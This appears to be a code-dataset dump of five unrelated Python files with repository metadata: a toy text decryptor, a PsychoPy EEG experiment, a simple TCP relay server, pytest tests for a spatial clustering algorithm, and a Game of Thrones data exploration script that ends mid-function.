3aadb545d1e1259b22bd9d6ea8c2d056aa0dfaf5 | 8360a692a74be829cdbfd1d32a62f32633fe5c58 | /assignments/mydecrypt.py | 57555ca7fb04d5bb9b42122a5e1fd5f0b685a695 | []
| no_license | SimonJinaphant/Programming-11-Python | ef3fbd004d916ae161d8fda31f20a7ac4088b193 | 97c056f47ac598e703bc5dc4078966760770f232 | refs/heads/master | 2016-09-05T14:07:39.697568 | 2014-08-28T21:10:44 | 2014-08-28T21:10:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 460 | py | from sys import argv
with open(argv[1],'r') as f:
encrypted_data = [encoded.decode('utf-8')[:-1] for encoded in f.readlines()]
uncrypted_data = []
for s, sentence in enumerate(encrypted_data):
uncrypted_data.append(list())
for i, letter in enumerate(sentence):
#print letter
uncrypted_data[s].append(unichr((ord(letter)-0x4E00)^0x2D))
with open(argv[1],'w') as f2:
for s1, sen in enumerate(uncrypted_data):
f2.write(u"".join(sen).encode('utf-8'))
| [
"[email protected]"
]
| |
cd5d5b7af45e4e5c60a22b93e77ccd89fdd61255 | 5c24336c033b5dd02f1022f9da3f0aee670c5b2f | /MATLAB Installed/BIDS_resources/P032_EX2/Code/ElenaPreviewFinal.py | bb55e5c402ef3364ccbf855c98da957eda11c730 | [
"CC0-1.0"
]
| permissive | JohnTyCa/The-SPN-Catalogue | ab29e39ad42a1793f38448ac018dcf4918935013 | 75e729f867c275433b68807bc3f2228c57a3ccac | refs/heads/main | 2023-08-30T06:31:35.726302 | 2022-05-16T14:17:39 | 2022-05-16T14:17:39 | 321,381,577 | 2 | 0 | CC0-1.0 | 2022-05-16T14:17:40 | 2020-12-14T14:56:49 | Python | UTF-8 | Python | false | false | 14,562 | py | from numpy import * #many different maths functions
from numpy.random import * #maths randomisation functions
import math, numpy, random
import numpy as np
from psychopy import gui, visual, core, data, event, clock, sound
import os # handy system and path functions
import visualExtra
import serial, time
#ser = serial.Serial('COM3', 115200, timeout=100)
#s = ser.read(100)
#ser.write(chr(0).encode())
#ser.write(chr(0))
#ser.write(b'0')
#ser.write('0'.encode('ISO-8859-1')
expName='ElenaPreviewEEG'#from the Builder filename that created this script
expInfo={'participant':'','streoAcuity':0,'subN':0}
dlg=gui.DlgFromDict(dictionary=expInfo,title=expName)
if dlg.OK==False: core.quit() #user pressed cancel
expInfo['date']=data.getDateStr()#add a simple timestamp
expInfo['expName']=expName
if not os.path.isdir('dataPreviewEEG'):
os.makedirs('dataPreviewEEG')#if this fails (e.g. permissions) we will get error
filename= 'dataPreviewEEG/' + expName
seedN =1000 #this way every subject sees the same stimuli, use subject number to have unique stimuli peer subject instead
random.seed(seedN)
verticalSize = 1080
disp = 3
myWin = visual.Window(allowGUI=False, units='pix', size=(800,800), allowStencil=True, viewScale=[1.0, 0.5], fullscr= True, screen = 1)
#these lines are very powerful, they create all stimuli using the special functions of psychopy
fixation=visual.Circle(myWin, pos=[0, 0], radius = 10, fillColor= 'red', lineColor = None)#this is a gray cross for the fixation
responseScreen=visual.TextStim(myWin, ori=0, text = 'Symmetrical Asymmetrical', pos=[0,256], height= 25, color='blue', colorSpace='rgb', units= 'pix')
myTexture = numpy.random.randint(0,2,(256,256))-0.8
rdp0 = visual.GratingStim(myWin, tex=myTexture, size=[512,512])
myTexture = numpy.random.randint(0,2,(256,256))-0.8
rdp1 = visual.GratingStim(myWin, tex=myTexture, size=[512,512]) #, color= 'blue')
temp = visual.ShapeStim (myWin, lineColor= 'red', fillColor=None)
dot = visual.Circle (myWin, radius=10, lineColor= 'green', fillColor=None)
tempLine = visual.Line (myWin, lineColor = 'green', start = [0,0], end = [0, 360])
#print (stencil.vertices)
punishmentSoundDuration = 0.8
s1 = sound.Sound(200,secs=punishmentSoundDuration,sampleRate=44100)
upshift = verticalSize/2 #upshift value
baselineDuration = 1.5
myClock = core.Clock()#this creates and starts a clock which we can later read
def message(type, nBlocksToGo = 1):
if type == 'HelloPractice':
string = ('Welcome to the Practice Experiment. You will see LOTS of images. Your task is to decide whether they are symmetrical or asymmetical.')
elif type == 'HelloMain':
string = ('Now for the real thing, its the same, but much longer. Try too keep your eyes and the central cross and not to blink!')
elif type == 'Goodbye':
string = ('Thank you for taking part in the Experiment')
elif type == 'Break':
string = "{} Blocks to go".format(nBlocksToGo) #new style code for string formatting
#string = str(nBlocksToGo) + " Blocks to go"
instructions=visual.TextStim(myWin, ori=0, text=string, pos=[0, 256], height=25, color='white', colorSpace='rgb', units= 'pix')
instructions.setPos([-disp, -upshift/2])
instructions.draw()
instructions.setPos([0, upshift/2])
instructions.draw()
myWin.flip()
#creates a list of x,y coordinates around a cricle with a startradius and
#makes the shape symetrical if axes > 0
def makePattern(centrex, centrey, shape, nvertices, startradius, axes):
increment =float(math.pi * 2 / nvertices) # example: pi * 2 / 12 = 0.52359
peri =0
nConcave =0
deviation = startradius * .3 #whatever you pick as startradius, the deviation in or out from it is 30% of startradius
minConcave = int(nvertices / 3) #always minimum 33% concave vertices - so 4 in the case of 12, 16 for 48
minPeri = startradius * 2 * math.pi #always minimum the circumenference of the starting circle
while (peri <minPeri) or (nConcave < minConcave):
counter =0
coords =[]
angleInc =0.
deviationList =[]
angleList = []
for i in range(nvertices):
deviationList.append(startradius + uniform(-deviation, deviation))#uniform to generate random numbers in range
angleList.append(uniform (- 0.017, +0.017) ) #this is + or - 1 degree
if axes>0:
npersector = int(nvertices / (axes *2)) # 3
for i in range (nvertices - npersector):
p = int (i%npersector) #gets rid of the float
s = floor(i/npersector) + 1 #floor rounds it down
n = npersector - 1
deviationList[int(npersector*s + (n-p))] = deviationList[i]
angleList[int(npersector*s + (n-p))] = - angleList[i]
if shape=='circle':
while counter <nvertices: #angle < (2 * math.pi):
angleInc = angleInc + increment
angle = angleInc + angleList[counter]
b = deviationList[counter] #this is the deviation which is 33% of the startradius
a = 0 #this is 0% of b
c = math.sqrt(a*a * cos(2*angle) +math.sqrt(b*b*b*b - a*a * sin(2*angle)*sin(2*angle)))
y =cos(angle) * c
x =sin(angle) * c
coords.append([centrex+x,centrey+y])
counter =counter +1
peri =visualExtra.computePerimeter(coords)
cx, ce = visualExtra.computeAngles (coords)
nConcave = len(ce)
newcoords = visualExtra.rotateVertices(vertices = coords, a = numpy.rad2deg(increment/2))
return newcoords
#draw either the preview with stencilR or the stimulus with stencil
#stencilR or stencilL to create the asymmetry
def drawStim(sten, cond): #stencilL, stencilR,
# this is the preview
if cond == 'figure'or cond == 'ground': # cond in ['figure', 'ground']
sten.enabled = False
rdp0.setPos([0, -upshift])
rdp0.draw()
rdp0.setPos([0, upshift])
rdp0.draw()
if cond == 'figure':
sten.enabled = True
sten.inverted = False
rdp1.setPos([-disp, -upshift])
sten.setPos ([-disp, -upshift])
rdp1.draw()
rdp1.setPos([0, upshift])
sten.setPos ([0, upshift])
rdp1.draw()
elif cond == 'ground':
sten.enabled = True
sten.inverted = True
rdp1.setPos([-disp, -upshift])
sten.setPos ([-disp, -upshift])
rdp1.draw()
rdp1.setPos([0, upshift])
sten.setPos ([0, upshift])
rdp1.draw()
sten.enabled = False
fixation.setPos([-disp, -upshift])
fixation.draw()
fixation.setPos([0, upshift])
fixation.draw()
def responseCollect(trialType, screen, practiceExp):
event.clearEvents()
respCorr = 0 # this stops the participants hacking through by pressing both a and l at the same time
responseScreen.setPos([0, -upshift/2])
responseScreen.draw()
responseScreen.setPos([0, upshift/2])
responseScreen.draw()
myWin.flip()
responseKey = event.waitKeys(keyList=['a', 'l', 'escape'])[0]
# responseKey = 'a' # debug
if responseKey == 'escape':
core.quit()
if screen == 'l':
if responseKey == 'a':
if trialType == 'asym':
respCorr = 0
else:
respCorr = 1
elif responseKey == 'l':
if trialType == 'asym':
respCorr = 1
else:
respCorr = 0
elif screen == 'r':
if responseKey == 'l':
if trialType == 'asym':
respCorr = 0
else:
respCorr = 1
elif responseKey == 'a':
if trialType == 'asym':
respCorr = 1
else:
respCorr = 0
if practiceExp == 'practice':
if respCorr == 0:
s1 = sound.Sound(200,secs=0.3,sampleRate=44100)
s1.play()
core.wait(punishmentSoundDuration)
return respCorr, responseKey
# This long loop runs through the trials
def mainLoop(trialbook, reps, practiceExp): # define Reps and set at bottom how many blocks you want
blockDuration = 20
nBlocksToGo = 24
trialCounter = 0
trials=data.TrialHandler(nReps=reps, method='random', trialList=data.importConditions(trialbook))
trials.extraInfo = expInfo
thisTrial=trials.trialList[0]
for thisTrial in trials:
if thisTrial!=None:
for paramName in thisTrial.keys():
exec('{} = thisTrial[paramName]'.format(paramName), locals(), globals())
cond = figureground #+ str(plane)
nV = 32 #number of Vertices
if symmetry == 'sym':
v = makePattern(0, 0, 'circle', nV, 100, 2)
elif symmetry == 'asym':
v = makePattern(0, 0, 'circle', nV, 100, 0) #if axes more than 0 is showing only symmetrical
else:
print('error')
if trialCounter == blockDuration and practiceExp=='exp':
nBlocksToGo = nBlocksToGo - 1
message('Break',nBlocksToGo = nBlocksToGo)
event.waitKeys(keyList=['g'])
trialCounter = 0
trialCounter = trialCounter + 1
if screen == 'l':
responseScreen.setText("Symmetry Asymmetry")
elif screen == 'r':
responseScreen.setText("Asymmetry Symmetry")
myTexture0 = numpy.random.randint(0,2,(128,128))-0.2
rdp0.tex = myTexture0
myTexture1 = numpy.random.randint(0,2,(128,128))-0.2
rdp1.tex = myTexture1
verticesP = [(-30,256),(-30, -256),(30,- 256),(30,256),(256, 256), (256, 196), (196, 196),
(196, 256),(-256, 256), (-256, 196), (-196, 196), (-196, 256)]
stencilP = visual.Aperture(myWin, units="pix", shape= verticesP, size = 1)
fixation.setRadius(8)
drawStim(stencilP, cond)
myWin.flip()
t = myClock.getTime() + 1.5 # fixation for this much time
while myClock.getTime() < t:
pass #do nothing
#
v[0][0] = -30
v[31][0] = 30
v[15][0] = -30
v[16][0] = 30
topL = [v[0][0],256]
topR = [v[31][0],256]
bottomL = [v[15][0],-256]
bottomR = [v[16][0],-256]
v.insert(0, topR)
v.insert(1, topL)
v.insert(18, bottomL)
v.insert(19, bottomR)
v.append([30, 256])
v.append([256, 256])
v.append([256, 196])
v.append([196, 196])
v.append([196, 256])
v.append([-256, 256])
v.append([-256, 196])
v.append([-196, 196])
v.append([-196, 256])
v.append([-256, 256])
stencil = visual.Aperture(myWin, units="pix", shape= v)
stencil.enabled = False
#generating 50% random dots
for x in range(128):
for y in range(128):
if random.randint(0,1):
myTexture0[x][y] = random.randint(0,1) -0.2
else:
myTexture0[x][y] = rdp0.tex[x][y]
rdp0.tex = myTexture0
for x in range(128):
for y in range(128):
if random.randint(0,1):
myTexture1[x][y] = random.randint(0,1) -0.2
else:
myTexture1[x][y] = rdp1.tex[x][y]
rdp1.tex = myTexture1
# this is the stimulus
fixation.setRadius(16)
drawStim(stencil, cond)
myWin.flip()
t = myClock.getTime() + 1.5
# tr= str(trigger)
# ser.write(tr.encode('raw_unicode_escape')) #this converts the str(trigger) into a UTF byte #ISO-8859-1
# ser.write(bytes(str(trigger)))
# print (tr, tr.encode('raw_unicode_escape'))
# core.wait(0.01)
# #ser.write(b'0')
# ser.write(chr(trigger).encode())
# ser.write(chr(triggers[reps]))
# core.wait(0.01)
# ser.write(chr(0))
# fixation for this much time
while myClock.getTime() < t:
pass #do nothing
myWin.flip()
if event.getKeys(["escape"]):
core.quit()
# responseScreen.setPos([0, -upshift/2])
# responseScreen.draw()
# responseScreen.setPos([0, upshift/2])
# responseScreen.draw()
# myWin.flip()
# w = myClock.getTime() + baselineDuration
#
# responseKey = event.waitKeys(keyList=['a', 'l', 'escape'])[0]
# while myClock.getTime() < w:
# if event.getKeys (['escape']):
# core.quit()
# event.clearEvents()
# myWin.close
# if responseKey == 'escape':
#a core.quit()
respCorr, choice = responseCollect(symmetry, screen, practiceExp)
# if symmetry == 'sym':
# if responseKey == 'a':
# respCorr = 1
# myWin.flip()
# elif responseKey == 'l':
# respCorr = 0
# s1 = sound.Sound(200,secs=0.3,sampleRate=44100)
# if block == "practice": s1.play()
# myWin.flip()
# elif symmetry == 'asym':
# if responseKey =='l':
# respCorr = 1
# myWin.flip()
# elif responseKey == 'a':
# respCorr = 0
# s1 = sound.Sound(200,secs=0.3,sampleRate=44100)
# if block == "practice": s1.play()
# myWin.flip()
trials.addData('respCorr', respCorr)
trials.addData('choice', choice)
#trials.addData('RT',RT)
trials.saveAsExcel(filename+'.xlsx', sheetName= 'data', dataOut=['all_raw'])
trials.saveAsWideText(filename+'.txt')
message('HelloPractice')
event.waitKeys(keyList = ['g'])
mainLoop('bookPreview.xlsx', 2, "practice") #32 practice trials
message('HelloMain')
event.waitKeys(keyList = ['g'])
mainLoop('bookPreview.xlsx', 30, "exp") #30 x 16 = 480 trials
message('Goodbye')
core.wait(2)
ser.close()
myWin.close()
core.quit()
| [
"[email protected]"
]
| |
db1fb4aa9d6bf0b1533d816eb6bf74d058a13110 | c4c9ba3dbde9a318204e49a77de38a07d2961a8b | /simpleserver.py | cac0fa3df5788b2e520c2599a72b5f991ac5f9ed | []
| no_license | kkingsbe/RealMultiplayer | 9db5b1ddd4f718ce68f889cc725755974f9e1dcf | e6c3540dfa214612ae1c73e208acd1c7858f0a48 | refs/heads/master | 2020-04-22T13:47:25.468029 | 2019-02-13T02:03:36 | 2019-02-13T02:03:36 | 170,421,728 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 498 | py | import socket
TCP_IP = socket.gethostname()
TCP_PORT = 5005
BUFFER_SIZE = 20 # Normally 1024, but we want fast response
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((TCP_IP, TCP_PORT))
s.listen(1)
conn1, addr = s.accept()
conn2, addr2 = s.accept()
print('Connection address:', addr)
print('Connection2 address:', addr2)
while 1:
data = conn1.recv(BUFFER_SIZE)
if not data: break
print("received data:", data)
conn2.send(data) # echo
conn1.close()
conn2.close() | [
"[email protected]"
]
| |
b60ad7df385f84596c6a0c1000ac89426cc71844 | ad0e939dd2ed5c772b19658eecd90954c33eeb22 | /region/p_regions/tests/test_azp_simulated_annealing.py | d09fddd2b727678e86800bb58457e3edfd671ecb | [
"BSD-3-Clause"
]
| permissive | yogabonito/region | b0697cf150fe6cd7986fb0281686c50626bad090 | 725e7e1f8cd01e5bb175803e3649d019a0e4f443 | refs/heads/master | 2021-01-21T15:23:03.717624 | 2018-04-04T14:05:43 | 2018-04-04T14:05:43 | 95,353,704 | 0 | 0 | null | 2017-06-25T10:45:16 | 2017-06-25T10:45:16 | null | UTF-8 | Python | false | false | 5,993 | py | import networkx as nx
from region.p_regions.azp import AZPSimulatedAnnealing
from region.tests.util import region_list_from_array, compare_region_lists
from region.util import dataframe_to_dict
from .data import adj, neighbors_dict, gdf, graph, w, \
attr, attr_dict, attr_str, double_attr_str, \
double_attr, double_attr_dict, \
optimal_clustering
# ### TESTS WITH SCALAR attr ##################################################
# test with csr_matrix
def test_scipy_sparse_matrix():
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_scipy_sparse_matrix(adj, attr, n_regions=2)
obtained = region_list_from_array(cluster_object.labels_)
compare_region_lists(obtained, optimal_clustering)
# tests with a GeoDataFrame as areas argument
def test_geodataframe():
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_geodataframe(gdf, attr_str, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# tests with a dict as areas argument
def test_dict():
value_dict = dataframe_to_dict(gdf, attr_str)
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_dict(neighbors_dict, value_dict, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# tests with Graph
# ... with dicts as attr and spatially_extensive_attr
def test_graph_dict_basic():
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_networkx(graph, attr_dict, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# ... with strings as attr and spatially_extensive_attr
def test_graph_str_basic():
nx.set_node_attributes(graph, attr_str, attr_dict)
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_networkx(graph, attr_str, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# test with W
def test_w_basic():
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_w(w, attr, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# ### TESTS WITH NON-SCALAR attr AND spatially_extensive_attr #################
# test with csr_matrix
def test_scipy_sparse_matrix_multi_attr():
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_scipy_sparse_matrix(adj, double_attr, n_regions=2)
obtained = region_list_from_array(cluster_object.labels_)
compare_region_lists(obtained, optimal_clustering)
# tests with a GeoDataFrame
def test_geodataframe_multi_attr():
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_geodataframe(gdf, double_attr_str, n_regions=2)
obtained = region_list_from_array(cluster_object.labels_)
compare_region_lists(obtained, optimal_clustering)
# tests with a dict as areas argument
def test_dict_multi_attr():
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_dict(neighbors_dict, double_attr_dict, n_regions=2)
obtained = region_list_from_array(cluster_object.labels_)
compare_region_lists(obtained, optimal_clustering)
# tests with Graph
# ... with dicts as attr and spatially_extensive_attr
def test_graph_dict_multi_attr():
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_networkx(graph, double_attr_dict, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# ... with strings as attr and spatially_extensive_attr
def test_graph_str_multi_attr():
nx.set_node_attributes(graph, attr_str, attr_dict)
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_networkx(graph, double_attr_str, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
# test with W
def test_w_multi_attr():
cluster_object = AZPSimulatedAnnealing(init_temperature=1,
max_iterations=2,
random_state=0)
cluster_object.fit_from_w(w, double_attr, n_regions=2)
result = region_list_from_array(cluster_object.labels_)
compare_region_lists(result, optimal_clustering)
| [
"[email protected]"
]
| |
663eb729df9fd31227930e3361b2418b2f4d6d5c | 89cb1736c052c6ecd4028a57d23a92252427bce4 | /game_of_thrones_EDA.py | bb0faf9ce6d8c23cb057a8f8ad5be870eb543f44 | []
| no_license | lucascmbarros/game_of_thrones_dataset | 889c1b4c8e0edba280dac459896390ef2ad94891 | a8febe918998e490502fa5903904c2583c37f829 | refs/heads/master | 2020-05-04T06:25:48.268120 | 2019-04-08T01:25:50 | 2019-04-08T01:25:50 | 179,005,703 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,128 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 20 16:26:49 2019
@author: lucas.barros
Assignment 2: Game of Thrones predictions
"""
#################################
# Basic libraries
#################################
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
#################################
# Importing file
#################################
file = 'GOT_character_predictions.xlsx'
df = pd.read_excel(file)
##############################################################################
# EDA
##############################################################################
# showing all columns when called
pd.set_option('display.max_columns', 500)
pd.set_option('display.max_rows', None)
print(df.columns)
'''
Some column names are not clear on what they are or too complicated to type
everytime it is needed; I'm renaming some for covinience
'''
df = df.rename(index = str, columns ={'S.No': 'charnumber',
'dateOfBirth': 'DOB',
'book1_A_Game_Of_Thrones': 'book1',
'book2_A_Clash_Of_Kings': 'book2',
'book3_A_Storm_Of_Swords': 'book3',
'book4_A_Feast_For_Crows': 'book4',
'book5_A_Dance_with_Dragons': 'book5'
})
print(df.info())
print(df.describe().round(2))
'''
The only variables that seem to be continuous are age, DOB, numDeadRelations,
popularity, the others are categorical/binary.
'''
df['isAlive'].describe()
df['isAlive'].value_counts()
#################################
# Flagging missing values
#################################
mv_bycolumn = df.isnull().sum()
print(mv_bycolumn)
#########################################################
# Creating new columns for the flagged missing values
#########################################################
'''
Creating columns for the missing values with 0 and 1s
'''
for col in df:
if df[col].isnull().any():
df['m_'+col] = df[col].isnull().astype(int)
df_dropped = df.dropna()
####################################
# Analysing the culture variable
####################################
df.culture.head()
# getting dummy variables for the cultures
dum_cult = pd.get_dummies(df[['culture']], dummy_na = True)
# analyzing the count of cultures
for col in dum_cult.iloc[:, :65]:
count = dum_cult[col].value_counts()
print(count)
'''
Westermen are decendent of Andals (have similar echnicity),
but since the lineage come from several generations on the past,
It is better to separete them.
'''
# filling NAs with unknown
fill = 'unknown'
df['culture'] = df['culture'].fillna(fill)
# Some culture have duplicates, aggregating them together
df['culture'][df['culture'].str.contains('Andal')] = 'Andal'
df['culture'][df['culture'].str.contains('Asshai')] = 'Asshai'
df['culture'][df['culture'].str.contains('Astapor')] = 'Astapor'
df['culture'][df['culture'].str.contains('Braavos')] = 'Braavos'
df['culture'][df['culture'].str.contains('Dorn')] = 'Dorne'
df['culture'][df['culture'].str.contains('Ghiscari')] = 'Ghiscari'
df['culture'][df['culture'].str.contains('Iron')] = 'Ironborn'
df['culture'][df['culture'].str.contains('iron')] = 'Ironborn'
df['culture'][df['culture'].str.contains('Lhazare')] = 'Lhazareen'
df['culture'][df['culture'].str.contains('Lyse')] = 'Lysene'
df['culture'][df['culture'].str.contains('Meereen')] = 'Meereen'
df['culture'][df['culture'].str.contains('orthmen')] = 'Northmen'
df['culture'][df['culture'].str.contains('Norvos')] = 'Norvos'
df['culture'][df['culture'].str.contains('Qarth')] = 'Qarth'
df['culture'][df['culture'].str.contains('Reach')] = 'Reach'
df['culture'][df['culture'].str.contains('River')] = 'Rivermen'
df['culture'][df['culture'].str.contains('Stormland')] = 'Stormland'
df['culture'][df['culture'].str.contains('Summer')] = 'Summer'
df['culture'][df['culture'].str.contains('Vale')] = 'Vale'
df['culture'][df['culture'].str.contains('Lyse')] = 'Lysene'
df['culture'][df['culture'].str.contains('ester')] = 'Westernmen'
'''
Free folks and windlings are actually the same people, just different
nomenclature.
'''
df['culture'][df['culture'].str.contains('Wilding')]= 'Windling'
df['culture'][df['culture'].str.contains('Free')]= 'Windling'
df['culture'][df['culture'].str.contains('free')]= 'Windling'
print(df['culture'][df['isAlive'] == 0].value_counts())
print(df['culture'][df['isAlive'] == 1].value_counts())
'''
Generally speaking, the inhabitants of the north of Westeros are the ones
that die the most. There is probably due to the number of wars in that region
plus what happens in the Great Wall.
'''
####################################
# Analysing the house variable
####################################
df.house.head()
# getting dummy variables for the cultures
dum_hou = pd.get_dummies(df[['house']], dummy_na = True)
#### analyzing the count of cultures
for col in dum_hou.iloc[:, :348]:
count = dum_hou[col].value_counts()
print(count)
# Filling NAs with unknown
fill = 'unknown'
df['house'] = df['house'].fillna(fill)
#### Some houses have duplicates, aggregating them together
df['house'][df['house'].str.contains('Lannister')] = 'Lannister'
df['house'][df['house'].str.contains('Baratheon')] = 'Baratheon'
df['house'][df['house'].str.contains('Brotherhood')] = 'Brotherhood without banners'
df['house'][df['house'].str.contains('Bolton')] = 'Bolton'
df['house'][df['house'].str.contains('Flint')] = 'Flint'
df['house'][df['house'].str.contains('Brune')] = 'Brune of Browhollow'
df['house'][df['house'].str.contains('Fossoway')] = 'Fossoway'
df['house'][df['house'].str.contains('Frey')] = 'Frey'
df['house'][df['house'].str.contains('Goodbrother')] = 'Goodbrother'
df['house'][df['house'].str.contains('House Harlaw')] = 'House Harlaw'
df['house'][df['house'].str.contains('Kenning')] = 'Kenning'
df['house'][df['house'].str.contains('Royce')] = 'Royce'
df['house'][df['house'].str.contains('Tyrell')] = 'Tyrell'
df['house'].value_counts()
print(df['house'][df['isAlive'] == 0].value_counts())
print(df['house'][df['isAlive'] == 1].value_counts())
'''
Night's Watch die the most, followed by obviously the Targaryen, and then
Starks, Lannisters, Greyjoys, and Freys probably due to the war between the
families.
'''
'''
According to my research, the most important families are Baratheon, Stark,
Lannister, Arryn, Tyrell, Tully, Greyjoy, Martell, and Targaryen.
After the Red Wedding, House Frey became one of the most important.
'''
##################################
# Analysing Title
##################################
print(df.title.value_counts().head(10))
print(df.title[df['isAlive'] == 1].value_counts().head(10))
df.title.isna().sum()
# filling NAs with unknown
fill = 'unknown'
df['title'] = df['title'].fillna(fill)
dum_title = pd.get_dummies(df[['title']], dummy_na = True)
df = pd.concat([df, dum_title], axis = 1)
'''
Higher titles of nobility seems to have a higher chance of surviving.
'''
##################################################
# Analysing Father, Mother, Heir, and Spouse
##################################################
# flagging missing values
print(df.father.isna().sum())
print(df.mother.isna().sum())
print(df.heir.isna().sum())
print(df.spouse.isna().sum())
# checking the distribution
print(df.father.value_counts())
print(df.mother.value_counts())
print(df.heir.value_counts())
# filling NAs with unknown
fill = 'unknown'
df['father'] = df['father'].fillna(fill)
df['mother'] = df['mother'].fillna(fill)
df['heir'] = df['heir'].fillna(fill)
df['spouse'] = df['spouse'].fillna(fill)
###################################################
# Analysing books
##################################################
# Flagging Missing Values
print(df.book1.isna().sum())
print(df.book2.isna().sum())
print(df.book3.isna().sum())
print(df.book4.isna().sum())
print(df.book5.isna().sum())
'''
no NAs
'''
print(df.book1.value_counts())
print(df.book2.value_counts())
print(df.book3.value_counts())
print(df.book4.value_counts())
print(df.book5.value_counts())
# Studying the relation between being in a book and being alive
'''There are not a lot of people alive in book1 since it tells a lot of
stories about what happened in the past.
'''
# Checking who appeared in all books, they are probably very significant.
df['all_books'] = (df['book1'] + df['book2'] + df['book3'] + df['book4'] +
df['book5'])
df['all_books'].value_counts()
# Doing a outlier for people who appeared in all books.
df['out_allbooks'] = 0
df['out_allbooks'] = df['all_books'][df['all_books'] == 5]
fill = 0
df['out_allbooks'] = df['out_allbooks'].fillna(fill)
# Flagging characters that didn't appear in any book.
df['no_books'] = 0
df.loc[ : , 'no_books'][df.loc[ : , 'all_books'] == 0] = 1
'''
Combining who appeared in different books might be significant to the
final analysis
'''
df['book_4_5'] = 0
df['book_4_5'] = df['book4'] + df['book5']
df['book_4_5'][df['isAlive']== 1].value_counts()
df['book_1_5'] = 0
df['book_1_5'] = df['book1'] + df['book5']
df['book_1_5'][df['isAlive']== 1].value_counts()
df['book_3_n_5'] = 0
df['book_3_n_5'] = df['book3'] + df['book5']
df['book_3_n_5'][df['isAlive']== 1].value_counts()
df['book_2_3'] = 0
df['book_2_3'] = df['book2'] + df['book3']
df['book_2_3'][df['isAlive']== 1].value_counts()
df['book_2_3'] = 0
df['book_2_3'] = df['book2'] + df['book3']
df['book_2_3'][df['isAlive']== 1].value_counts()
df['book_3_4_5'] = 0
df['book_3_4_5'] = df['book4'] + df['book5'] + df['book3']
df['book_3_4_5'][df['isAlive']== 1].value_counts()
'''
These combinations above shows who appeared in/or the selected books.
'''
print(np.corrcoef(x=df['isAlive'], y = df['book1']))
print(np.corrcoef(x=df['isAlive'], y = df['book2']))
print(np.corrcoef(x=df['isAlive'], y = df['book3']))
print(np.corrcoef(x=df['isAlive'], y = df['book4']))
print(np.corrcoef(x=df['isAlive'], y = df['book5']))
print(np.corrcoef(x=df['isAlive'], y = df['all_books']))
'''
The is a small correlation between being alive and the older the book,
although book4 has the highest correlation with being alive. Also the more the
person appeared the highest the probability of being alive.
'''
#################################################################
# Analysing If Mother, Father, Heir, and/or Spouse are alive
#################################################################
# Flagging missing Values
print(df.isAliveMother.isna().sum())
print(df.isAliveFather.isna().sum())
print(df.isAliveHeir.isna().sum())
print(df.isAliveSpouse.isna().sum())
'''
There are a lot of missing values, I'm assuming that if it is unknown that
their family is alive, the character is probably not important, hence I'm
inputing missing values with 0.
'''
# Filling NAs with unknown
fill = 0
df.isAliveMother = df.isAliveMother.fillna(fill)
df.isAliveFather = df.isAliveFather.fillna(fill)
df.isAliveHeir = df.isAliveHeir.fillna(fill)
df.isAliveSpouse = df.isAliveSpouse.fillna(fill)
###################################################
# Analysing if is Married and/or is Noble
###################################################
# Flagging missing Values
print(df.isMarried.isna().sum())
print(df.isNoble.isna().sum())
'''
No missing values
'''
# Checking the distribution of Married and Spouse
print(df.isMarried.value_counts())
print(df.isNoble.value_counts())
print(df['isMarried'][df['isAlive'] == 1].sum())
print(df['isNoble'][df['isAlive'] == 1].sum())
'''
69.2% of Married are alive
72.5% of Nobles are alive
'''
df['isMarried'][df['isMarried'] == 1 ][df['isNoble'] == 1][df['isAlive'] == 1].sum()
'''
183 are Married and are Noble
109 are Married, Noble, and are Alive
'''
'''
Creating a column for characters that are noble and married
'''
df['lucky'] = 0
df['lucky'] = df.loc[ : ,'isNoble'] + df.loc[: , 'isMarried']
df['lucky'] = df['lucky'].replace(1, 0)
df['lucky'] = df['lucky'].replace(2, 1)
#############################################################
# Analysing Age
#############################################################
# Flagging missing values for AGE
print(df.age.isna().sum())
'''
Droping the 2 extreme outliers
'''
df = df.drop(df.index[110])
df = df.drop(df.index[1349])
df.age.describe()
'''
Getting the age of the person, if he/she is alive and adding with the DOB it
will give us the current year of the dataset(which is 305). Also if we get the
oldest person alive and he his/hers DOB, we can assume that anyone that was
born before that is dead. The oldest person alive was born in 208, so that
will be a threshold.
'''
'''
Creating a column with dummy 1 and 0 to if they are living the interval
between 208 and 305.
'''
df['300year_vs_dob'] = 305 - df['DOB']
df['alive_by_age'] = 0
def conditions(df):
if (df['age'] == df['300year_vs_dob']):
return 0
elif (df['age'] < df['300year_vs_dob']):
return 1
